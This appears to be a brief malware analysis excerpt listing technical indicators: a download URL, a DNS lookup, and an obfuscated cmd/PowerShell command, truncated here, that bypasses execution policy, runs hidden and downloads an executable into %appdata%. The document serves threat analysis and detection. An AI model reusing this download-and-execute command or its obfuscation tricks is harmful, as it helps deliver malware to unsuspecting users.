Technical Information
- http://santiagoveraguas.com/doc.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^ow^eRSHE^l^l.^EX^E ^-^E^xECutI^o^N^pOlI^c^y ^byp^AsS ^-n^o^pRoFiL^E -WINDOwst^YLe hiD^Den (^NEW-^ob^JECT ^sYs^Tem.NeT.^W^eBcl^I^e^NT).^D^o^wnl^oa^df^ILE^('http://santiag...
- DNS ASK sa#####overaguas.com
- '<SYSTEM32>\cmd.exe' /c "p^ow^eRSHE^l^l.^EX^E ^-^E^xECutI^o^N^pOlI^c^y ^byp^AsS ^-n^o^pRoFiL^E -WINDOwst^YLe hiD^Den (^NEW-^ob^JECT ^sYs^Tem.NeT.^W^eBcl^I^e^NT).^D^o^wnl^oa^df^ILE^('http://santiag...' (with hidden window)